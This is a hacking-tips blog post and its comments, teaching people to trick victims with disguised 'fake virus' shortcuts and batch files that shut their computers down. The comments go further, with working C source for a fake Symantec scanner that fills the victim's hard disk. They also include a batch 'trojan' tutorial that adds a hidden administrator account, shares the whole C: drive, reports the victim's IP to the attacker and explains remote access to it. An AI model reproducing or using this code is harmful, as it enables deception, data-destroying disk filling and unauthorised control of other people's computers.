How to make 2 fake virus in any O.P easily! No training required!
Unknown
05:36
Activate
,
Cheats
,
Create Virus
,
Desktop
,
Free
,
Hacks
,
No Software needed
,
Tips and Tricks
,
Windows and Mac Software Mix
7 comments
How to make a Fake VIRUS in windows with ease…
No training required!
So lets start with this :-
Well what we actually have to do in this hack is too make a fake virus in the desktop so as to trick the user to double click it and boom..
Steps :-
1. Right click on the desktop, then 'New' and choose “Create Shortcut”.
2. A New window will pop up, Type in it :-
shutdown –s –t 900 –c “This Computer is Fuc*** by HTD”3. Now click on “NEXT” button. Now you can choose the name of the fake name for the virus file choose anything like :-
“My Computer”
“Internet Explorer”
“Recycle Bin”
Its all depended on the user usage that's why i used these name cos these are the most used terms in a windows xp box.
4. Now click on “close” to close the window. a new shortcut would come on the desktop with the name you wanted.
5. Now to change the icon of the shortcut just Follow these steps :-
Right click it >> Properties >> Customize tab >> Change icon >> Browse >> Choose the icon >> Click OK
6. All done hell yeah…
Here’s how it will look like once it is launched:
Your victim’s PC will display messages as in the above image, and then initiate a shutdown sequence which can be stopped by entering “shutdown ““a” in the Run command box. It looks bad, but is otherwise completely harmless.
No training required!
So lets start with this :-
Well what we actually have to do in this hack is too make a fake virus in the desktop so as to trick the user to double click it and boom..
Steps :-
1. Right click on the desktop, then 'New' and choose “Create Shortcut”.
2. A New window will pop up, Type in it :-
shutdown –s –t 900 –c “This Computer is Fuc*** by HTD”3. Now click on “NEXT” button. Now you can choose the name of the fake name for the virus file choose anything like :-
“My Computer”
“Internet Explorer”
“Recycle Bin”
Its all depended on the user usage that's why i used these name cos these are the most used terms in a windows xp box.
4. Now click on “close” to close the window. a new shortcut would come on the desktop with the name you wanted.
5. Now to change the icon of the shortcut just Follow these steps :-
Right click it >> Properties >> Customize tab >> Change icon >> Browse >> Choose the icon >> Click OK
6. All done hell yeah…
(2) Fake Virus Batch File:
I got this prank from WikiHow. I love it because it looks the most like an actual attack. Copy and paste the following into an open Notepad window, then save the file with any name you choose and an extension of “.bat”
Here’s the code:
cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep
echo Wscript.Sleep 5000>C:sleep5000.vbs
echo Wscript.Sleep 3000>C:sleep3000.vbs
echo Wscript.Sleep 4000>C:sleep4000.vbs
echo Wscript.Sleep 2000>C:sleep2000.vbs
cd %systemroot%System32
dir
cls
start /w wscript.exe C:sleep3000.vbs
echo Deleting Critical System Files…
echo del *.*
start /w wscript.exe C:sleep3000.vbs
echo Deletion Successful!
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo:
echo Deleting Root Partition…
start /w wscript.exe C:sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x…
cd C:Documents and SettingsAll UsersStart MenuPrograms
mkdir h4x
start /w wscript.exe C:sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1…
start /w wscript.exe C:sleep3000.vbs
echo cd C:Documents and SettingsAll UsersStart MenuProgramsStartuph4x
echo start hax.exe
start /w wscript.exe C:sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:sleep2000.vbs
echo Disabling Windows Firewall…
start /w wscript.exe C:sleep2000.vbs
echo Killing all processes…
start /w wscript.exe C:sleep2000.vbs
echo Allowing virus to boot from startup…
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:sleep2000.vbs
pause
shutdown -s -t 10 -c “Your computer has committed suicide. Have a nice day.”
Here’s how it will look like once it is launched:
Your victim’s PC will display messages as in the above image, and then initiate a shutdown sequence which can be stopped by entering “shutdown ““a” in the Run command box. It looks bad, but is otherwise completely harmless.
Subscribe to:
Post Comments
(
Atom
)
#include
ReplyDelete#include
#include
#include
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;
void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);
void main()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3);
gotoxy(12,8);
delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch();
gotoxy(12,8);
delline();
findroot();
}
void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs("THIS PROGRAM NEEDS TO CHECK YOUR PC FOR ERRORS.IF YOU RUN THIS PROGRAM IT WILL\n\rCLEAN THE ERRORS AND \n\rELIMINATE THE VIRUSES ON YOUR PC.\n\n\rSYMANTEC NORTON PRODUCT COPYRIGHT 2012.\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");
if((choice=getch())!=13)
exit(0);
}
void draw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
cputs("SYMANTEC SECURITY SCAN - 2012 (QUICK SYSTEM SCANNER)");
}
void findroot()
{
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\trojanalex.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\trojanalex.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\trojanalex.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\trojanalex.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\trojanalex.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\trojanalex.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\trojanalex.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\trojanalex.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
exit(1);
}
void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}
void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");
}
SAVE IT IN NOTEPAD++ [.CPP]
ReplyDeleteOR COMPILE IT USIN ANY C+ COMPILERS ,,,,I PRFER BORLAND
IF U DONT HAVE IT DOWNLOAD IT FROM.
http://altd.embarcadero.com/download/bcppbuilder/freecommandLinetools.exe
IF U DONT KNOW HOW TO THEN REFEER ....
http://www.webnotes.org/bcc55eng.htm
if still doughtfull contact mee .....
h290598@gmail.com or geetha.kallianpur@rediffmail.com
void crazymouse()
{
int i = 0;
while(i<100)
{
Sleep(1000);
int x = rand()%1000;
int y = rand()%700; SetCursorPos(x, y);
i++;
}
}
#include
ReplyDelete#include
int main()
{
RECT rc;
HWND hWnd;
POINT lpPoint;
hWnd = FindWindowEx(FindWindow("Shell_TrayWnd",NULL),NULL,"Button","Start");
if(hWnd == NULL)
{
printf("Unable to find start button!\n");
return 0;
}
while(!GetAsyncKeyState(VK_F10))
{
GetWindowRect(hWnd,&rc);
GetCursorPos(&lpPoint);
if(PtInRect(&rc, lpPoint))
{
EnableWindow(hWnd,FALSE);
ShowWindow(hWnd,FALSE);
}
else
{
EnableWindow(hWnd,TRUE);
ShowWindow(hWnd,TRUE);
}
Sleep(1);
}
if(!IsWindowVisible(hWnd))
{
EnableWindow(hWnd,TRUE);
ShowWindow(hWnd,TRUE);
}
return 0;
}
i can't remember where i got it so im not takin any credit for it.....
How to Create a trojan in .bat file
ReplyDeleteA Trojan, sometimes referred to as a Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user's computer system.
In this post i will tell you How to create your own trojan horse in a .bat file,Helping you to hack into another persons computer.I had previously posted a tutorial on How to sent a trojan as a txt file but this post will explain you creating a Trojan in a .bat file to infect a Remote computer.
Creating a Trojan in a .bat file - Procdure
1.Go to start and click on run and type cmd
2.Now insert this command: net
And you will get something like this
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send
We will select some of those commands and put them on a .bat file.
What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and write there:
dir
pause
And now save this as test.bat and execute it.
---------------------- Starting -------------------
-:Server:-
The plan here is to share the C: drive and make a new user
with administrators access
Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.
Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant
Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it's nice
yo know which version of windows xp you are going to try share.
Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.
Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.
-!extras!-
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.
->To see your ip in the dos prompt put this command: ipconfig
-----------------------: Client :----------------
Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.
Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access.
Hope you liked the post! Pass the comments
Thnx harshal singh.
ReplyDeletemost welcome buddy!
ReplyDelete